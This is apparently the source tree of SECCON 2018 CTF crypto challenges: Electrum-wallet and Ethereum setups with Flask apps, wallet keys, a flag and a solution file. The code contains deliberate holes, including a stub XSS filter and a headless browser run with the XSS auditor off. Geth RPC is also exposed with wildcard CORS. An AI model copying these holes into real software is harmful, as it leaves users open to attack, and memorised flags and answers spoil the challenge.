41 |             "1CSDiadHUV9rtYYBmTCW2XwaFfLQsSuEfq",
42 |             "16yMi4o6VfxyTC5nNmUZRmyV9kbZs822Fy",
43 |             "1PdrtFGgMtUcbmL7G9bximXTNzRQtctceV",
44 |             "1BYAKa93uezv3YAfPEaSVvNkJwd48qHWSw",
45 |             "12GWR4eZdm4cc7ZqEcchenFYabcc6SDGi6",
46 |             "16uHaTPPMJGzFafRpNUsHJL11LFJNVQMa5",
47 |             "1QDMhwEb8wMPhfNPnZiqtSo9vqUHbTerhF",
48 |             "1Kk1mWSpR5X2P6wtG8RhJ9QitrDFYhsyTt",
49 |             "1KVQzLShuDYZVLD7Es2uuUQ7abWhMXaEZ4",
50 |             "1FHz3d3snY4WNfJp3LDgqPrh8CFTmKQdo1",
51 |             "19X7CS79mABu6UhAW9K1d1J1xWhy6jiwH",
52 |             "171UB1uZjGmDLsmaNMDWrRCeRf6855ZiPm",
53 |             "196x9ZiHn8WDvubpSaHvNvdadcCnUZiwgR",
54 |             "15P6BEAb7m3GP6r5xEoXGEubMd477kCEAc",
55 |             "1Eb39MmbAuAt1d45hNZ1am6UsUYzjCBV34",
56 |             "14ukDtQXNDmuG2gECf6KDZAhW2pkzSsqKb",
57 |             "167ooCHygXruMFucapaK7Ervyutk2Vzx27",
58 |             "1BVToDBPVaNh28djPvMPTmXzuaxPdc53J7",
59 |             "1Jq5ymj5MVv471gWjNywgxsdNob46gk6WW"
60 |         ]
61 |     },
62 |     "keystore": {
63 |         "seed": "sort bread emerge village range calm robust verb exercise seed flee auction",
64 |         "type": "bip32",
65 |         "xprv": "xprv9s21ZrQH143K3GAQMLNWx1BtVTizmALKrTMkHkahzq5WLTVHqB73F5qKbQeeAKU7SWiXj3fWWPdyVCGZ2EjumQpVjooH9KaizLyhsGLBFKw",
66 |         "xpub": "xpub661MyMwAqRbcFkEsTMuXK98d3VZVAd4BDgHM68zKZAcVDFpSNiRHnt9oSi3wMdWs17J3dR4gK6UtCKvCdYJym1PwxqJXDJyxPP1dHvguR7S"
67 |     },
68 |     "pruned_txo": {},
69 |     "seed_type": "standard",
70 |     "seed_version": 15,
71 |     "stored_height": 540771,
72 |     "transactions": {},
73 |     "tx_fees": {},
74 |     "txi": {},
75 |     "txo": {},
76 |     "use_encryption": false,
77 |     "verified_tx3": {},
78 |     "wallet_type": "standard",
79 |     "winpos-qt": [
80 |         100,
81 |         100,
82 |         840,
83 |         400
84 |     ]
85 | }


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/client/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM ubuntu:18.04
 2 | 
 3 | RUN apt-get update
 4 | RUN apt-get install -y wget chromium-browser python3 python3-pip pyqt5-dev-tools python3-setuptools unzip 
 5 | 
 6 | RUN pip3 install flask
 7 | 
 8 | RUN useradd -ms /bin/bash wallet
 9 | 
10 | WORKDIR /home/wallet
11 | RUN wget https://github.com/spesmilo/electrum/archive/3.0.0.zip && unzip 3.0.0.zip
12 | 
13 | WORKDIR electrum-3.0.0
14 | RUN pyrcc5 icons.qrc -o gui/qt/icons_rc.py && python3 setup.py install
15 | 
16 | ADD ./src/daemon.py /home/wallet/electrum-3.0.0/lib/
17 | ADD ./src/servers.json /home/wallet/electrum-3.0.0/lib/
18 | ADD ./src/servers_testnet.json /home/wallet/electrum-3.0.0/lib/
19 | 
20 | ADD ./src/wallet.tgz /home/wallet/
21 | 
22 | ADD ./src/run.sh /home/wallet/electrum-3.0.0/
23 | RUN chmod +x /home/wallet/electrum-3.0.0/run.sh
24 | 
25 | ADD ./src/app.py /home/wallet/electrum-3.0.0/
26 | 
27 | USER wallet
28 | 
29 | #CMD timeout -sKILL 15 /home/wallet/electrum-3.0.0/run.sh
30 | #RUN ./electrum daemon --testnet &
31 | # chromium-browser --no-sandbox --headless --disable-gpu


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/client/src/app.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | import random
 3 | import string
 4 | import re
 5 | from flask import Flask, render_template, request
 6 | from subprocess import Popen
 7 | 
 8 | app = Flask(__name__)
 9 | 
10 | @app.route('/')
11 | def index():
12 |     return "alive"
13 | 
14 | @app.route('/api/<string:key>', methods = ['GET', 'POST'])
15 | def checkMessage(key):
16 |     matched = re.match(u"^\w{8}$", key)
17 |     if matched == None:
18 |         return "key format error"
19 | 
20 |     URL = "http://flask:8000/show/" + key
21 |     #URL = "http://192.168.2.137:8080/" + key
22 |     cmd = ["timeout -sKill 15  chromium-browser --args --disable-xss-auditor --no-sandbox --headless --disable-gpu --remote-debugging-port=9222 "+URL]
23 |     proc = Popen(cmd, shell=True, stdin=None, stdout=None, stderr=None, close_fds=True)
24 |     return "done"
25 | 
26 | if __name__ == '__main__':
27 |     #app.run(debug = True)
28 |     app.run(debug=False, host='0.0.0.0', port=8000)
29 | 


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/client/src/run.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | ./electrum daemon start
4 | python3 app.py
5 | 
6 | #sleep 3
7 | #chromium-browser --no-sandbox --headless --disable-gpu --remote-debugging-port=9222 http://192.168.2.137:8080
8 | #tail -f /dev/null
9 | 


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/client/src/servers.json:
--------------------------------------------------------------------------------
1 | {
2 |     "127.0.0.1": {
3 |         "pruning": "-",
4 |         "s": "50002",
5 |         "t": "50001",
6 |         "version": "1.1"
7 |     }
8 | }
9 | 


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/client/src/servers_testnet.json:
--------------------------------------------------------------------------------
1 | {
2 |         "127.0.0.1": {"t":"51001", "s":"51002"}
3 | }
4 | 


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/client/src/wallet.tgz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Crypto/bitcoin/build/client/src/wallet.tgz


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/docker-compose.yaml:
--------------------------------------------------------------------------------
 1 | version: '2'
 2 | services:
 3 |   flask:
 4 |     build: ./server/flask
 5 |     command: gunicorn app:app -b :8000 --name app -k gevent --worker-connections 1000
 6 |     links:
 7 |       - client
 8 | 
 9 |   nginx:
10 |     image: nginx
11 |     volumes:
12 |       - ./server/nginx/conf.d:/etc/nginx/conf.d
13 |     ports:
14 |       - 80:80
15 |     links:
16 |       - flask
17 | 
18 |   client:
19 |     build: ./client
20 |     command: bash run.sh


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/server/flask/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python
2 | RUN pip install flask gunicorn requests gevent
3 | 
4 | RUN useradd webapp
5 | USER webapp
6 | ADD ./src/ /usr/src/webapp
7 | ENV HOME /usr/src/webapp
8 | WORKDIR /usr/src/webapp
9 | 


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/server/flask/src/.bash_history:
--------------------------------------------------------------------------------
 1 | ls
 2 | python app.py 
 3 | python app.py 
 4 | ls
 5 | ls
 6 | python app.py 
 7 | ls
 8 | ls
 9 | python app.py 
10 | python app.py 
11 | python app.py 
12 | python app.py 
13 | python app.py 
14 | python app.py 
15 | python app.py 
16 | python app.py 
17 | python app.py 
18 | python app.py 
19 | python app.py 
20 | python app.py 
21 | python app.py 
22 | python app.py 
23 | python app.py 
24 | python app.py 
25 | python app.py 
26 | python app.py 
27 | python app.py 
28 | python app.py 
29 | python app.py 
30 | python app.py 
31 | python app.py 
32 | python app.py 
33 | python app.py 
34 | python app.py 
35 | which python
36 | python --version
37 | python app.py 
38 | python app.py 
39 | python app.py 
40 | python
41 | python app.py 
42 | python app.py 
43 | python app.py 
44 | python app.py 
45 | python app.py 
46 | python app.py 
47 | python app.py 
48 | python app.py 
49 | python app.py 
50 | python app.py 
51 | python app.py 
52 | python app.py 
53 | ls
54 | ls dest/
55 | cat dest/U7N9mAtO 
56 | cat dest/U7N9mAtO 
57 | ls
58 | python app.py 
59 | python app.py 
60 | python app.py 
61 | python app.py 
62 | python app.py 
63 | python app.py 
64 | python app.py 
65 | python app.py 
66 | python app.py 
67 | python app.py 
68 | python app.py 
69 | python app.py 
70 | python app.py 
71 | ls
72 | ls dest/
73 | cat dest/*
74 | rm dest/*
75 | ls
76 | 


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/server/flask/src/.python_history:
--------------------------------------------------------------------------------
 1 | ''.join(secrets.choice(string.ascii_uppercase + string.digits) for _ in range(N))
 2 | N = 5
 3 | ''.join(random.choices(string.ascii_uppercase + string.digits, k=N))
 4 | import random
 5 | imort string
 6 | import string
 7 | ''.join(random.choices(string.ascii_uppercase + string.digits, k=N))
 8 | ''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase + string.digits, k=N))
 9 | ''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase + string.digits, k=8))
10 | 


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/server/flask/src/app.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | import random
 3 | import string
 4 | import re
 5 | from flask import Flask, render_template, request, make_response
 6 | from subprocess import Popen
 7 | 
 8 | app = Flask(__name__)
 9 | 
10 | @app.route('/')
11 | def index():
12 |     return render_template('index.html')
13 | 
14 | @app.route('/post', methods = ['POST'])
15 | def messagePost():
16 |     def generateRandomString(n):
17 |         return ''.join(random.choices(string.ascii_lowercase + string.ascii_uppercase + string.digits, k=n))
18 |     def filterString(message):
19 |         # xss filtering~~
20 |         return message
21 |     key = generateRandomString(8)
22 |     keyPath = os.path.join("./", "dest", key)
23 |     message = filterString(request.form["pirate-forms-contact-message"])
24 |     with open(keyPath, "w") as fd:
25 |         fd.write(message)
26 | 
27 |     cmd = ["curl http://client:8000/api/"+key]
28 |     proc = Popen(cmd, shell=True, stdin=None, stdout=None, stderr=None, close_fds=True)
29 | 
30 |     return render_template("message.html", message=message)
31 | 
32 | @app.route('/show/<string:key>', methods = ['GET'])
33 | def messageShow(key):
34 |     matched = re.match(u"^\w{8}$", key)
35 |     if matched == None:
36 |         return "key format error"
37 |     keyPath = os.path.join("./", "dest", key)
38 |     try:
39 |         with open(keyPath, "r") as fd:
40 |             message = fd.read()
41 |     except:
42 |         return "key is invalid"
43 |     resp = make_response(render_template("message2.html", message=message))
44 |     resp.set_cookie('hint', 'Pz8/ID8/PyA/Pz8gPz8/ID8/PyA/Pz8gPz8/ID8/PyA/Pz8gPz8/ID8/PyA/Pz8gPz8/ID8/PyA/Pz8gPz8/ID8/PyA/Pz8gPz8/ID8/PyBwaWVjZSBjcmltZSBtaXh0dXJlIGFydHdvcms=')
45 |     return resp
46 | 
47 | if __name__ == '__main__':
48 |     app.run(debug = True)
49 |     #app.run(debug=False, host='0.0.0.0', port=8000)
50 | 


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/server/flask/src/static/wp-content/plugins/pirate-forms/public/css/front.css:
--------------------------------------------------------------------------------
  1 | /*
  2 | Version: 2.4.4
  3 |  */
  4 | .pirate_forms_wrap .form_field_wrap,
  5 | .widget .pirate_forms_wrap .form_field_wrap {
  6 | 	margin-bottom: 20px;
  7 | }
  8 | 
  9 | .pirate_forms_wrap {
 10 | 	width: 100%;
 11 | }
 12 | 
 13 | .sidebar .pirate_forms_wrap,
 14 | .sidebar-wrap .pirate_forms_wrap,
 15 | #sidebar-secondary .pirate_forms_wrap {
 16 | 	margin-bottom: 20px;
 17 | }
 18 | 
 19 | .widget .form_field_wrap,
 20 | .sidebar .form_field_wrap,
 21 | .sidebar-wrap .form_field_wrap,
 22 | #sidebar-secondary .form_field_wrap {
 23 | 	width: 100%;
 24 | 	max-width: 100%;
 25 | }
 26 | 
 27 | .pirate_forms_clearfix,
 28 | .pirate-forms-fields-container:after,
 29 | .pirate-forms-file-upload-wrapper:after {
 30 | 	display: block;
 31 | 	visibility: hidden;
 32 | 	clear: both;
 33 | 	height: 0;
 34 | 	font-size: 0;
 35 | 	content: " ";
 36 | }
 37 | 
 38 | .contact_submit_wrap {
 39 | 	text-align: right;
 40 | }
 41 | 
 42 | .pirate-forms-maps-custom {
 43 | 	min-width: 150px;
 44 | }
 45 | 
 46 | .pirate-forms-maps-custom input {
 47 | 	display: inline;
 48 | 	width: auto;
 49 | }
 50 | 
 51 | .pirate-forms-maps-custom label {
 52 | 	display: inline;
 53 | 	cursor: pointer;
 54 | }
 55 | 
 56 | .pirate-forms-maps-custom span {
 57 | 	margin-left: 5px;
 58 | }
 59 | 
 60 | .pirate-forms-fields-container .form_field_wrap {
 61 | 	box-sizing: border-box;
 62 | 	padding-right: 15px;
 63 | 	padding-left: 15px;
 64 | }
 65 | 
 66 | .pirate_forms_three_inputs_wrap .form_field_wrap input {
 67 | 	box-sizing: border-box;
 68 | 	width: 100%;
 69 | 	max-width: 100%;
 70 | 	margin: 0;
 71 | }
 72 | 
 73 | .pirate-forms-fields-container .form_field_wrap textarea,
 74 | .pirate-forms-fields-container .form_field_wrap select {
 75 | 	width: 100%;
 76 | 	max-width: 100%;
 77 | 	margin: 0;
 78 | }
 79 | 
 80 | .pirate_forms_wrap .form_field_wrap .pirate-forms-submit-button {
 81 | 	display: inline-block;
 82 | 	width: auto;
 83 | }
 84 | 
 85 | .pirate_forms_wrap .pirate-forms-footer {
 86 | 	display: table;
 87 | 	float: left;
 88 | 	width: 100%;
 89 | }
 90 | 
 91 | .pirate_forms_wrap .pirate-forms-footer .form_field_wrap {
 92 | 	width: auto;
 93 | 	display: table-cell;
 94 | 	float: none;
 95 | 	margin: 0;
 96 | 	vertical-align: middle;
 97 | 	padding-bottom: 10px;
 98 | }
 99 | 
100 | .pirate_forms_wrap .pirate_forms_three_inputs_wrap input[type=checkbox] {
101 | 	display: inline-block;
102 | 	width: auto;
103 | 	height: inherit;
104 | }
105 | 
106 | .pf-checkbox-label {
107 | 	display: inline;
108 | 	cursor: pointer;
109 | }
110 | 
111 | .pf-checkbox-label span {
112 | 	margin-left: 5px;
113 | }
114 | 
115 | .pirate_forms .contact_checkbox_wrap #pirate-forms-contact-checkbox, .pirate_forms .contact_checkbox_wrap p {
116 | 	display: inline-block;
117 | }
118 | 
119 | @media (max-width: 480px) {
120 | 	.pirate_forms_wrap .pirate-forms-footer .form_field_wrap,
121 | 	.pirate_forms_wrap .form_field_wrap .pirate-forms-submit-button {
122 | 		display: block;
123 | 		width: 100%;
124 | 	}
125 | 
126 | 	.pirate_forms_wrap .pirate-forms-footer .pirateform_wrap_classes_spam_wrap,
127 | 	.pirate_forms_wrap .pirate-forms-footer .form_captcha_wrap {
128 | 		margin-bottom: 20px;
129 | 	}
130 | 
131 | 	.pirate_forms_wrap .form_captcha_wrap {
132 | 		padding: 0;
133 | 	}
134 | 	.pirate_forms_wrap .form_captcha_wrap > div > div {
135 | 		transform: scale(0.8);
136 | 		overflow: visible;
137 | 	}
138 | }
139 | 


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/server/flask/src/static/wp-content/plugins/pirate-forms/public/js/custom-spam.js:
--------------------------------------------------------------------------------
 1 | /* global pf */
 2 | /* global jQuery */
 3 | (function($, pf){
 4 | 
 5 |     $(document).ready(function() {
 6 |         onDocumentReady();
 7 |     });
 8 | 
 9 |     $(window).load(function() {
10 |         onWindowLoad();
11 |     });
12 | 
13 |     function onDocumentReady() {
14 |         // fired when a form is changed from the inspector.
15 |         if(pf.spam.gutenberg === 1){
16 |             jQuery('body').delegate('.pirate-forms-maps-custom', 'addCustomSpam', function(){
17 |                 var i = 0;
18 |                 addCustomSpam(i++, jQuery(this));
19 |             });
20 |         }
21 | 
22 |         // for the front end.
23 |         jQuery('.pirate-forms-maps-custom').each(function(i){
24 |             addCustomSpam(i, jQuery(this));
25 |         });
26 |     }
27 | 
28 |     function onWindowLoad() {
29 |         // fired when a saved form is loaded in gutenberg.
30 |         if(pf.spam.gutenberg === 1){
31 |             jQuery('.pirate-forms-maps-custom').each(function(i){
32 |                 addCustomSpam(i, jQuery(this));
33 |             });
34 |         }
35 |     }
36 | 
37 |     function addCustomSpam(i, object){
38 |         var $id = 'xobkcehc-' + i;
39 |         object.empty().html(jQuery('<input id="' + $id + '" name="xobkcehc" type="' + 'xobkcehc'.split('').reverse().join('') + '" value="' + pf.spam.value + '"><label for="' + $id + '"><span>' + pf.spam.label + '</span></label>'));
40 |     }
41 | })(jQuery, pf);
42 | 


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/server/flask/src/static/wp-content/plugins/themeisle-companion/obfx_modules/companion-legacy/assets/css/hestia/clients-bar.css:
--------------------------------------------------------------------------------
 1 | .hestia-clients-bar {
 2 |     padding: 70px 0;
 3 | }
 4 | .hestia-clients-bar .clients-bar-wrapper {
 5 |     list-style-type: none;
 6 |     margin: 0;
 7 |     padding: 0;
 8 | }
 9 | .hestia-clients-bar .clients-bar-wrapper li {
10 |     display: inline-block;
11 |     margin: 25px;
12 |     vertical-align: middle;
13 | }
14 | .hestia-clients-bar .clients-bar-wrapper li a {
15 |     display: block;
16 |     padding: 5px;
17 | }
18 | .hestia-clients-bar .clients-bar-wrapper li img {
19 |     max-width: 100%;
20 |     height: auto;
21 | }
22 | 
23 | .hestia-clients-bar .row > div {
24 |     padding: 30px;
25 | }


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/server/flask/src/static/wp-content/plugins/themeisle-companion/obfx_modules/menu-icons/css/public.css:
--------------------------------------------------------------------------------
1 | .obfx-menu-icon.fa,
2 | .obfx-menu-icon.dashicons,
3 | .obfx-menu-icon {
4 |     margin-top: -3px;
5 |     margin-right: 3px;
6 |     vertical-align: middle;
7 | }


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/server/flask/src/static/wp-content/uploads/2018/09/animal-cold-color-416118.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Crypto/bitcoin/build/server/flask/src/static/wp-content/uploads/2018/09/animal-cold-color-416118.jpg


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/server/flask/src/static/wp-content/uploads/2018/09/fig-6-e1536639090614.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SECCON/SECCON2018_online_CTF/30ca811bab4c1dfb68c6b4fd0e5d682487b861ff/Crypto/bitcoin/build/server/flask/src/static/wp-content/uploads/2018/09/fig-6-e1536639090614.png


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/server/flask/src/static/wp-content/uploads/2018/09/url.txt:
--------------------------------------------------------------------------------
1 | https://pixabay.com/en/wolf-howl-animal-snow-art-vintage-2288533/
2 | https://pixabay.com/en/bitcoin-cryptocurrency-digital-2007769/
3 | https://pixabay.com/en/bitcoin-money-decentralized-2007912/
4 | 


--------------------------------------------------------------------------------
/Crypto/bitcoin/build/server/nginx/conf.d/webapp.conf:
--------------------------------------------------------------------------------
 1 | limit_req_zone $binary_remote_addr zone=mylimit:10m rate=120r/m;
 2 | 
 3 | server {
 4 |     listen 80;
 5 |     charset utf-8;
 6 |     access_log off;
 7 | 
 8 |     client_max_body_size 5M;
 9 | 
10 |     location / {
11 |         #limit_req zone=mylimit;
12 | 
13 |         proxy_pass http://flask:8000;
14 |         proxy_set_header Host $host:$server_port;
15 |         proxy_set_header X-Forwarded-Host $server_name;
16 |         proxy_set_header X-Real-IP $remote_addr;
17 |         proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
18 |     }
19 | 
20 |     location ~ ^/show/ {
21 |     	allow 127.0.0.1;
22 |         deny all;
23 |     }
24 | 
25 | #    location /static {
26 | #        access_log   off;
27 | #        expires      30d;
28 | #        alias /app/static;
29 | #    }
30 | }
31 | 
32 | 


--------------------------------------------------------------------------------
/Crypto/bitcoin/flag.txt:
--------------------------------------------------------------------------------
1 | SECCON{2e36c3919822de3223e55efd8425f055}
2 | 


--------------------------------------------------------------------------------
/Crypto/bitcoin/question.txt:
--------------------------------------------------------------------------------
1 | Electrum Kamuy
2 | 
3 | Collect secrets.
4 | FLAG: SECCON{md5(583...)}
5 | 
6 | Server:http://bitcoin.pwn.seccon.jp/
7 | 


--------------------------------------------------------------------------------
/Crypto/ether/answer.txt:
--------------------------------------------------------------------------------
1 | Connect to the blockchain network using ethereum client on your own.
2 | To get the password of the contract, type
3 | "eth.getStorageAt('contract address', 6)"
4 | in your console.
5 | You will get private password, and can be the owner of the contract.
6 | You can manipulate the result easily if you know seed and block number.
7 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/build.txt:
--------------------------------------------------------------------------------
 1 | 1. geth init
 2 | 2. move the master key to keystore dir
 3 | 3. run and check enode
 4 | 4. stop
 5 | 5. make static-nodes.json
 6 | 6. run
 7 | 
 8 | # build
 9 | $ cp docker-compose.yaml.1 docker-compose.yaml
10 | $ chmod 777 server/flask/src/db.json
11 | $ docker-compose build
12 | $ docker-compose up
13 | 
14 | $ cp docker-compose.yaml.2 docker-compose.yaml
15 | $ chmod 777 server/flask/src/db.json
16 | $ docker-compose build
17 | 
18 | # start
19 | $ docker-compose up
20 | 
21 | # mining
22 | http://IP/kLPm23z6HjnXKD99/miner/start
23 | 
24 | # show status
25 | http://IP/kLPm23z6HjnXKD99/admin/show
26 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/miner/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM ubuntu:18.04
 2 | 
 3 | RUN apt-get update
 4 | RUN apt-get install -y wget
 5 | 
 6 | WORKDIR /opt/
 7 | RUN wget https://gethstore.blob.core.windows.net/builds/geth-linux-amd64-1.8.15-89451f7c.tar.gz &&\
 8 |     tar xzvf geth-linux-amd64-1.8.15-89451f7c.tar.gz
 9 | ENV PATH $PATH:/opt/geth-linux-amd64-1.8.15-89451f7c
10 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/miner/docker-compose.yaml:
--------------------------------------------------------------------------------
 1 | version: '2'
 2 | services:
 3 |   eth1:
 4 |     build: .
 5 |     command: tail -f /dev/null 
 6 |     ports:
 7 |       - 8545:8545
 8 |       - 30304:30303
 9 |     volumes:
10 |       - ./src/:/usr/src/eth/
11 |       - ./ethash/:/root/.ethash/
12 | 
13 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/miner/src/UTC--2018-09-21T08-13-18.619300810Z--0d7134fe1fff95780f05c6751dc4514cdf0134e7:
--------------------------------------------------------------------------------
1 | {"address":"0d7134fe1fff95780f05c6751dc4514cdf0134e7","crypto":{"cipher":"aes-128-ctr","ciphertext":"07e06c0e23f0b3fdd2efacda6273b042ca42f32d725f6baa20f04861d7da57ea","cipherparams":{"iv":"b97a09fb3eb81fdcf742e0fea3711bd0"},"kdf":"scrypt","kdfparams":{"dklen":32,"n":262144,"p":1,"r":8,"salt":"5406247f0809d7ed343dcbee1c9b16ba0e2be9a3af7bda6026e6f269fd8e6fcd"},"mac":"7e23d4f94aab100e0cf3fb68c8342bb46bceef384ebdc03e160f8ede19c0f9d5"},"id":"0c8ab7b1-98f6-40c7-b1ab-412c323630c6","version":3}


--------------------------------------------------------------------------------
/Crypto/ether/build/miner/src/cmd.sh:
--------------------------------------------------------------------------------
1 | geth --datadir /usr/src/eth/ --maxpeers 10000 --networkid 2994
2 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/miner/src/genesis.json:
--------------------------------------------------------------------------------
 1 | {
 2 |    "config": {
 3 |       "chainId": 2994,
 4 |       "homesteadBlock": 0,
 5 |       "eip155Block": 0,
 6 |       "eip158Block": 0,
 7 |       "byzantiumBlock": 0
 8 |    },
 9 |    "difficulty": "10",
10 |    "gasLimit": "2000000",
11 |    "alloc": {
12 |       "0d7134fe1fff95780f05c6751dc4514cdf0134e7": { 
13 |           "balance": "10000000000000000000000000000000000" 
14 |       }
15 |    }
16 | }
17 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/server/docker-compose.yaml:
--------------------------------------------------------------------------------
 1 | version: '2'
 2 | services:
 3 |   flask:
 4 |    build: ./flask
 5 |    #ports:
 6 |    #  - 8000:8000
 7 |    #command: tail -f /dev/null 
 8 |    command: gunicorn app:app -b :8000 --name app -k gevent --worker-connections 1000
 9 |    #volumes:
10 |    #  - ./flask/src/:/usr/src/webapp
11 |    environment:
12 |      - IP_ADDR=127.0.0.1
13 |    links:
14 |      - etherver
15 | 
16 |   nginx:
17 |     image: nginx
18 |     volumes:
19 |       - ./nginx/conf.d:/etc/nginx/conf.d
20 |     ports:
21 |       - 80:80
22 |     links:
23 |       - flask
24 | 
25 |   # docker-compose logs -f etherver
26 |   etherver:
27 |     build: ./etherver
28 |     ports:
29 |       - 8545:8545
30 |       - 30303:30303
31 |     #command: tail -f /dev/null 
32 |     command: bash /usr/src/etherver/cmd.sh
33 |     volumes:
34 |       - ./etherver/src/:/usr/src/etherver/
35 |       - ./etherver/ethash/:/root/.ethash/
36 | 
37 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/server/etherver/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM ubuntu:18.04
 2 | 
 3 | RUN apt-get update
 4 | RUN apt-get install -y wget python3 python3-pip
 5 | RUN pip3 install flask
 6 | 
 7 | WORKDIR /opt/
 8 | RUN wget https://gethstore.blob.core.windows.net/builds/geth-linux-amd64-1.8.15-89451f7c.tar.gz &&\
 9 |     tar xzvf geth-linux-amd64-1.8.15-89451f7c.tar.gz
10 | ENV PATH $PATH:/opt/geth-linux-amd64-1.8.15-89451f7c
11 | 
12 | 
13 | 
14 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/server/etherver/src/UTC--2018-09-21T08-13-18.619300810Z--0d7134fe1fff95780f05c6751dc4514cdf0134e7:
--------------------------------------------------------------------------------
1 | {"address":"0d7134fe1fff95780f05c6751dc4514cdf0134e7","crypto":{"cipher":"aes-128-ctr","ciphertext":"07e06c0e23f0b3fdd2efacda6273b042ca42f32d725f6baa20f04861d7da57ea","cipherparams":{"iv":"b97a09fb3eb81fdcf742e0fea3711bd0"},"kdf":"scrypt","kdfparams":{"dklen":32,"n":262144,"p":1,"r":8,"salt":"5406247f0809d7ed343dcbee1c9b16ba0e2be9a3af7bda6026e6f269fd8e6fcd"},"mac":"7e23d4f94aab100e0cf3fb68c8342bb46bceef384ebdc03e160f8ede19c0f9d5"},"id":"0c8ab7b1-98f6-40c7-b1ab-412c323630c6","version":3}


--------------------------------------------------------------------------------
/Crypto/ether/build/server/etherver/src/app.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | from flask import Flask
 3 | 
 4 | app = Flask(__name__)
 5 | app.config["SECRET_KEY"] = "insecure"
 6 | 
 7 | keyDir = "/usr/src/etherver/keystore"
 8 | 
 9 | @app.route("/api/getKey/<string:accountAddr>")
10 | def getKey(accountAddr):
11 |     files = os.listdir(keyDir)
12 |     f = [fname for fname in files if accountAddr[2:].lower() in fname]
13 |     with open(os.path.join(keyDir, f[0]), "r") as fd:
14 |         key = fd.read()
15 |     return key
16 | 
17 | @app.route("/api/getGenesis")
18 | def getGenesis():
19 |     with open("/usr/src/etherver/genesis.json", "r") as fd:
20 |         genesis = fd.read()
21 |     return genesis
22 | 
23 | if __name__ == "__main__":
24 |     app.run(debug=False, host="0.0.0.0", port=80)
25 | 
26 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/server/etherver/src/cmd.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | 
3 | geth --datadir /usr/src/etherver/ --port 30303 --networkid=2994 --rpc --rpccorsdomain "*" --rpcaddr "0.0.0.0" --rpcapi="admin,debug,eth,miner,net,personal,rpc,txpool,web3,utils" --nodiscover --maxpeers 10000 &
4 | python3 /usr/src/etherver/app.py
5 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/server/etherver/src/genesis.json:
--------------------------------------------------------------------------------
 1 | {
 2 |    "config": {
 3 |       "chainId": 2994,
 4 |       "homesteadBlock": 0,
 5 |       "eip155Block": 0,
 6 |       "eip158Block": 0,
 7 |       "byzantiumBlock": 0
 8 |    },
 9 |    "difficulty": "10",
10 |    "gasLimit": "2000000",
11 |    "alloc": {
12 |       "0d7134fe1fff95780f05c6751dc4514cdf0134e7": { 
13 |           "balance": "10000000000000000000000000000000000" 
14 |       }
15 |    }
16 | }
17 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/server/etherver/src/sol/deploy.txt:
--------------------------------------------------------------------------------
1 | contract = 
2 | 


--------------------------------------------------------------------------------
/Crypto/ether/build/server/etherver/src/sol/lv1/Gacha-abi.txt:
--------------------------------------------------------------------------------
  1 | [
  2 | 	{
  3 | 		"constant": false,
  4 | 		"inputs": [
  5 | 			{
  6 | 				"name": "_seed",
  7 | 				"type": "uint256"
  8 | 			}
  9 | 		],
 10 | 		"name": "initSeed",
 11 | 		"outputs": [],
 12 | 		"payable": false,
 13 | 		"stateMutability": "nonpayable",
 14 | 		"type": "function"
 15 | 	},
 16 | 	{
 17 | 		"constant": true,
 18 | 		"inputs": [],
 19 | 		"name": "played",
 20 | 		"outputs": [
 21 | 			{
 22 | 				"name": "",
 23 | 				"type": "uint256"
 24 | 			}
 25 | 		],
 26 | 		"payable": false,
 27 | 		"stateMutability": "view",
 28 | 		"type": "function"
 29 | 	},
 30 | 	{
 31 | 		"constant": false,
 32 | 		"inputs": [],
 33 | 		"name": "pickUp",
 34 | 		"outputs": [
 35 | 			{
 36 | 				"name": "",
 37 | 				"type": "bool"
 38 | 			}
 39 | 		],
 40 | 		"payable": false,
 41 | 		"stateMutability": "nonpayable",
 42 | 		"type": "function"
 43 | 	},
 44 | 	{
 45 | 		"constant": true,
 46 | 		"inputs": [],
 47 | 		"name": "lastHash",
 48 | 		"outputs": [
 49 | 			{
 50 | 				"name": "",
 51 | 				"type": "uint256"
 52 | 			}
 53 | 		],
